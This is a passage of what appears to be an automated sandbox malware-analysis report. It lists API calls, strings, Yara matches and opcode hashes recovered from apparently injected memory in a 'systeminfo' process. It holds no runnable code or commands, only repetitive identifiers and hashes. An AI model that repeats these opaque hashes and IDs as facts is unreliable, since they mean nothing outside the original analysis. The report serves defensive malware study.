                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 4d1532ff57b21335fc81b49430d903a15ae1b69bdf410a6ecbbe51e904dd138e
                                                                                                                                                                                • Instruction ID: 4c43658a33b9d4d547fdbe8ba14bac4dcf2b02527415f19357fea416a608f6d2
                                                                                                                                                                                • Opcode Fuzzy Hash: 4d1532ff57b21335fc81b49430d903a15ae1b69bdf410a6ecbbe51e904dd138e
                                                                                                                                                                                • Instruction Fuzzy Hash: 0090026120240003611571584814756400E8BE0205B56C031E14165B0DC525D9916566
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: 8549b6860994093ba38773caf6e8a584b5d9aa93da0a166a0babbe6eb24d503c
                                                                                                                                                                                • Instruction ID: 75cdb494227c1f0f394cc10853bb6c1b0a24a6307e5b0d3fb8ee724b0b7fdcd5
                                                                                                                                                                                • Opcode Fuzzy Hash: 8549b6860994093ba38773caf6e8a584b5d9aa93da0a166a0babbe6eb24d503c
                                                                                                                                                                                • Instruction Fuzzy Hash: 2390023120140802F1907158480478A00098BD1305F96C025A0427674DCA15DB597BE2
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
• Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
• Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
• Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
• Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 00573ACB
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeUninitialize
                                                                                                                                                                                • String ID: @J7<
                                                                                                                                                                                • API String ID: 3442037557-2016760708
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeUninitialize
                                                                                                                                                                                • String ID: @J7<
                                                                                                                                                                                • API String ID: 3442037557-2016760708
                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0057968C
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                • String ID: D2V
                                                                                                                                                                                • API String ID: 3298025750-3886701758
                                                                                                                                                                                APIs
                                                                                                                                                                                • RtlAllocateHeap.NTDLL(005619D6,?,2VW,005619D6,005755DE,00575632,?,005619D6,005755DE,00001000,?,?,00000000), ref: 0057963F
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                • String ID: 2VW
                                                                                                                                                                                • API String ID: 1279760036-3242251881
                                                                                                                                                                                APIs
                                                                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00564502
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Load
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,0056824E,00000010,00000000,?,?,00000044,00000000,00000010,0056824E,?,?,00000000), ref: 00579743
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateInternalProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2186235152-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00559E05
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 00559E05
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 005682BC
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,00561CC0,00577F1E,005755DE,00561C8D), ref: 005680B3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 005682BC
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,00561CC0,00577F1E,005755DE,00561C8D), ref: 005680B3
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 00560DBD
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4147225829.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Offset: 00550000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_550000_systeminfo.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1836367815-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                • Opcode ID: fd5d1ddfa569985f96f36eeff5d95e64dc571ff65f4dd34e4dfe42c50e3c29fe
                                                                                                                                                                                • Instruction ID: 9cfa53b0c3cd65538f19536f0a62d03619d0fe18e4a8ba536b3fb9545116ecf5
                                                                                                                                                                                • Opcode Fuzzy Hash: fd5d1ddfa569985f96f36eeff5d95e64dc571ff65f4dd34e4dfe42c50e3c29fe
                                                                                                                                                                                • Instruction Fuzzy Hash: B1B09B719015C5C5FB11F7604A0871779046BD0705F16C171D2431671F4738D1D5E5B6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148627566.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4650000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 58bf01ac2c174cf1359ed716a5ad3968ca3e4d2ddcd1212da5de6cf0b4ae3094
                                                                                                                                                                                • Instruction ID: 9d76acc9a7c6d8385ecea8bc7f613db16c0d24a7f2664da0f949d1f15be35c90
                                                                                                                                                                                • Opcode Fuzzy Hash: 58bf01ac2c174cf1359ed716a5ad3968ca3e4d2ddcd1212da5de6cf0b4ae3094
                                                                                                                                                                                • Instruction Fuzzy Hash: F141D370618B0D4FE768AF689081676B3E2FB95304F50462DDD8AC3262FA70F8468789
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148627566.0000000004650000.00000040.00000800.00020000.00000000.sdmp, Offset: 04650000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4650000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                                                                • API String ID: 0-3558027158
                                                                                                                                                                                • Opcode ID: 783b8036d06e497d3d08686341f50762f06a95b81b1578544af2b324524cb097
                                                                                                                                                                                • Instruction ID: 0ad484977774976fc0001ade6d339b277041370c667a5a7d1da13323455c37fb
                                                                                                                                                                                • Opcode Fuzzy Hash: 783b8036d06e497d3d08686341f50762f06a95b81b1578544af2b324524cb097
                                                                                                                                                                                • Instruction Fuzzy Hash: 139150F04482948EC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE89058B85
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                                                                • Opcode ID: 195127ccd90c3c757ad2b4d953240ab094443e52fc8631bfde75afc4e8d88960
                                                                                                                                                                                • Instruction ID: 9e08bd94eaee62862273fff5d468cce62761f8a6b85078b928c18589b511b83e
                                                                                                                                                                                • Opcode Fuzzy Hash: 195127ccd90c3c757ad2b4d953240ab094443e52fc8631bfde75afc4e8d88960
                                                                                                                                                                                • Instruction Fuzzy Hash: DE510DB1B00156BFDB10DFA989C057EF7B8BB48604B108669E495E7742E374FE108BE1
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                                                                • Opcode ID: 29bb941442c1e85cca4e0bead817c0f75232c147cbd7e631ba236233457d9f43
                                                                                                                                                                                • Instruction ID: d1a89ccdf3893558da0faeb6cea84c164c1ecd08a68b4feb253614ccf4bb6235
                                                                                                                                                                                • Opcode Fuzzy Hash: 29bb941442c1e85cca4e0bead817c0f75232c147cbd7e631ba236233457d9f43
                                                                                                                                                                                • Instruction Fuzzy Hash: AF51E571A00645AFDB24DF9CC8909BFB7BCEF44204B048D9AE496E7651E6B4FA408760
                                                                                                                                                                                Strings
                                                                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 047D4742
                                                                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 047D4787
                                                                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 047D4655
                                                                                                                                                                                • Execute=1, xrefs: 047D4713
                                                                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 047D46FC
                                                                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 047D4725
                                                                                                                                                                                • ExecuteOptions, xrefs: 047D46A0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                • API String ID: 0-484625025
                                                                                                                                                                                • Opcode ID: 141425591db74698c50f46841e20d58e4ae5324779eea13721d4f252443b98f8
                                                                                                                                                                                • Instruction ID: 82d4e67f50d792c4f6c48098876ca9d5d55916bddae94a36562acccd76a6cb3c
                                                                                                                                                                                • Opcode Fuzzy Hash: 141425591db74698c50f46841e20d58e4ae5324779eea13721d4f252443b98f8
                                                                                                                                                                                • Instruction Fuzzy Hash: 0D51F671650219BAEF14AEA5EC89BBE77FCEB48304F0405A9E505AB381E770BE458F50
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: __aulldvrm
                                                                                                                                                                                • String ID: +$-$0$0
                                                                                                                                                                                • API String ID: 1302938615-699404926
                                                                                                                                                                                • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                                • Instruction ID: 87ce855a3e5bd837902969207766e7da8063222189645461d9a968deb95df7ae
                                                                                                                                                                                • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                                                                • Instruction Fuzzy Hash: DE81CF70E052499EDF28CF68C8917FEBBB5AFC5310F18431AEA61A7391D774B8608B51
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                • String ID: %%%u$[$]:%u
                                                                                                                                                                                • API String ID: 48624451-2819853543
                                                                                                                                                                                • Opcode ID: 65368137bc84c73099c7a34fbb44d34c1c95c786eb31c643a6f38c018e423bab
                                                                                                                                                                                • Instruction ID: 727fa5f6db1aba9b7ab56b70bbceb72dc86a6cc88341e2469f737f8f22e2de49
                                                                                                                                                                                • Opcode Fuzzy Hash: 65368137bc84c73099c7a34fbb44d34c1c95c786eb31c643a6f38c018e423bab
                                                                                                                                                                                • Instruction Fuzzy Hash: 6D2151B6E00119ABDB10DFA9C844AEEB7ECEF54744F040656E945E3210EB70FA158BA1
                                                                                                                                                                                Strings
                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 047D031E
                                                                                                                                                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 047D02E7
                                                                                                                                                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 047D02BD
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.000000000485D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                • Associated: 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_7_2_4730000_systeminfo.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                • API String ID: 0-2474120054
                                                                                                                                                                                • Opcode ID: cf61340a7b94338bbc87ab37d8805fe99b3884cd72033509473a7f6405b5a574
                                                                                                                                                                                • Instruction ID: 4bc4ba1d611ebeababc508c6f3bf89a83d3e60a5d97544602cc05085429a3a95
                                                                                                                                                                                • Opcode Fuzzy Hash: cf61340a7b94338bbc87ab37d8805fe99b3884cd72033509473a7f6405b5a574
                                                                                                                                                                                • Instruction Fuzzy Hash: 71E1BD306547819FE725DF28C884B2AB7E4BB88328F140A5DF5A58B3E1E774F844CB52
                                                                                                                                                                                Strings
                                                                                                                                                                                • RTL: Re-Waiting, xrefs: 047D7BAC
                                                                                                                                                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 047D7B7F
                                                                                                                                                                                • RTL: Resource at %p, xrefs: 047D7B8E
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, Offset: 04730000, based on PE: true
                                                                                                                                                                                 • Associated: 00000007.00000002.4148681632.0000000004859000.00000040.00001000.00020000.00000000.sdmp
